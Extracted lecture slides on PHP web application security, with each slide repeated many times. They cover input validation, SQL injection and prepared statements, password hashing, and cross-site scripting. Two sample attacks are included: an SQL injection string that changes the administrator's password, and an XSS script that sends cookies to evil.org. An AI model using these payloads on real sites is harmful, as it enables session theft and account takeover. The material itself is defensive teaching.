Validating a String
I There are many ctype_ functions the canbe used to check the content of a string, forexample:
I ctype_alpha($str) is true if theargument contains only letters.
I ctype_alnum($str) is true if theargument contains only letters or digits.
I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.
I Also use the empty function to check if theparameter is set, as when validating anumber.
21 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a String
I There are many ctype_ functions the canbe used to check the content of a string, forexample:
I ctype_alpha($str) is true if theargument contains only letters.
I ctype_alnum($str) is true if theargument contains only letters or digits.
I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.
I Also use the empty function to check if theparameter is set, as when validating anumber.
21 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a String
I There are many ctype_ functions the canbe used to check the content of a string, forexample:
I ctype_alpha($str) is true if theargument contains only letters.
I ctype_alnum($str) is true if theargument contains only letters or digits.
I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.
I Also use the empty function to check if theparameter is set, as when validating anumber.
21 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Other Input
I Not only _GET and _POST data comesfrom client input.
I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.
I Whenever reading from these, data mustbe validated.
22 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Other Input
I Not only _GET and _POST data comesfrom client input.
I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.
I Whenever reading from these, data mustbe validated.
22 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Other Input
I Not only _GET and _POST data comesfrom client input.
I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.
I Whenever reading from these, data mustbe validated.
22 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
23 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Database Access ControlI The PHP program shall connect to the database as
a user with as few rights as possible. Never let PHPconnect as a superuser, like root.
I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;
I This file can be included with an include directive,but shall not be accessible with HTTP requests.
I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.
I Alternatively, it can be protected as describedabove, in the section on file system security.
24 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Database Access ControlI The PHP program shall connect to the database as
a user with as few rights as possible. Never let PHPconnect as a superuser, like root.
I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;
I This file can be included with an include directive,but shall not be accessible with HTTP requests.
I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.
I Alternatively, it can be protected as describedabove, in the section on file system security.
24 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Database Access ControlI The PHP program shall connect to the database as
a user with as few rights as possible. Never let PHPconnect as a superuser, like root.
I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;
I This file can be included with an include directive,but shall not be accessible with HTTP requests.
I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.
I Alternatively, it can be protected as describedabove, in the section on file system security.
24 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Database Access ControlI The PHP program shall connect to the database as
a user with as few rights as possible. Never let PHPconnect as a superuser, like root.
I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;
I This file can be included with an include directive,but shall not be accessible with HTTP requests.
I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.
I Alternatively, it can be protected as describedabove, in the section on file system security.
24 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Database Access ControlI The PHP program shall connect to the database as
a user with as few rights as possible. Never let PHPconnect as a superuser, like root.
I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;
I This file can be included with an include directive,but shall not be accessible with HTTP requests.
I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.
I Alternatively, it can be protected as describedabove, in the section on file system security.
24 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection
I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.
I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.
I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.
25 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection
I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.
I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.
I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.
25 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection
I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.
I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.
I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.
25 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection Example
I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .
" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.
I A malicious user could specify the user id’ or uid like ’%admin%.
I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"
and the administrators password ischanged.
26 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection Example
I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .
" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.
I A malicious user could specify the user id’ or uid like ’%admin%.
I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"
and the administrators password ischanged.
26 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SQL Injection Example
I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .
" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.
I A malicious user could specify the user id’ or uid like ’%admin%.
I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"
and the administrators password ischanged.
26 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting SQL Injection,Prepared Statements
I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.
I The prepared statement execution consists of twostages: prepare and execute.
I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.
I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.
27 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting SQL Injection,Prepared Statements
I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.
I The prepared statement execution consists of twostages: prepare and execute.
I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.
I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.
27 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting SQL Injection,Prepared Statements
I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.
I The prepared statement execution consists of twostages: prepare and execute.
I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.
I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.
27 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting SQL Injection,Prepared Statements
I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.
I The prepared statement execution consists of twostages: prepare and execute.
I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.
I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.
27 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statement ExampleI In the prepare stage, the SQL statement is defined
and parameters are specified as ?.$stmt = $mysqli->prepare(
"UPDATE usertable SET pwd=? WHERE uid=?;");
I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.
$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();
I Note that is it not possible to alter the statement.
I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.
28 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statement ExampleI In the prepare stage, the SQL statement is defined
and parameters are specified as ?.$stmt = $mysqli->prepare(
"UPDATE usertable SET pwd=? WHERE uid=?;");
I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.
$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();
I Note that is it not possible to alter the statement.
I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.
28 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statement ExampleI In the prepare stage, the SQL statement is defined
and parameters are specified as ?.$stmt = $mysqli->prepare(
"UPDATE usertable SET pwd=? WHERE uid=?;");
I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.
$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();
I Note that is it not possible to alter the statement.
I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.
28 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statement ExampleI In the prepare stage, the SQL statement is defined
and parameters are specified as ?.$stmt = $mysqli->prepare(
"UPDATE usertable SET pwd=? WHERE uid=?;");
I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.
$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();
I Note that is it not possible to alter the statement.
I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.
28 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statements ImprovePerformance
I Prepared statements are not only moresecure, they are also faster than ordinarystatements when executing the samestatements multiple times.
I This is because they are interpreted onlyonce by the database server.
29 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prepared Statements ImprovePerformance
I Prepared statements are not only moresecure, they are also faster than ordinarystatements when executing the samestatements multiple times.
I This is because they are interpreted onlyonce by the database server.
29 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
30 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password EncryptionI Whenever the application includes some kind of
login mechanism, it is necessary to store user’spasswords.
I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.
I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.
I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.
I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.
31 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password EncryptionI Whenever the application includes some kind of
login mechanism, it is necessary to store user’spasswords.
I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.
I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.
I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.
I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.
31 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password EncryptionI Whenever the application includes some kind of
login mechanism, it is necessary to store user’spasswords.
I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.
I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.
I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.
I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.
31 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password EncryptionI Whenever the application includes some kind of
login mechanism, it is necessary to store user’spasswords.
I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.
I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.
I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.
I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.
31 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password EncryptionI Whenever the application includes some kind of
login mechanism, it is necessary to store user’spasswords.
I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.
I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.
I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.
I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.
31 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Hashing
I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.
I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.
I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.
32 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Hashing
I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.
I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.
I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.
32 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Hashing
I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.
I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.
I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.
32 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Hashing ExampleI To hash a password before storing it, use
the password_hash function. ThePASSWORD_DEFAULT parameterspecifies that the default hashing algorithmshall be used.password_hash($password, PASSWORD_DEFAULT);
I To check a password entered at loginagainst a stored, hashed, password, usethe password_verify function. The$hash parameter is the hashed value readfrom the data storage.password_verify($password, $hash);
33 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Hashing ExampleI To hash a password before storing it, use
the password_hash function. ThePASSWORD_DEFAULT parameterspecifies that the default hashing algorithmshall be used.password_hash($password, PASSWORD_DEFAULT);
I To check a password entered at loginagainst a stored, hashed, password, usethe password_verify function. The$hash parameter is the hashed value readfrom the data storage.password_verify($password, $hash);
33 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
34 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting, XSS
I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.
I This can happen if a web server displayscontent that comes from any externalsource.
I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.
35 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting, XSS
I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.
I This can happen if a web server displayscontent that comes from any externalsource.
I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.
35 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting, XSS
I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.
I This can happen if a web server displayscontent that comes from any externalsource.
I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.
35 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,
say a user submits the following comment.<script>
window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie
</script>
I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.
I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.
I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.
36 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,
say a user submits the following comment.<script>
window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie
</script>
I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.
I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.
I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.
36 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,
say a user submits the following comment.<script>
window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie
</script>
I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.
I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.
I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.
36 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,
say a user submits the following comment.<script>
window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie
</script>
I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.
I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.
I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.
36 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.
I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.
I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.
I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.
I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS
I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.
I Never insert data anywhere in a <script>element.
I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.
I The above situations can be solved, butthat is not covered here.
37 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
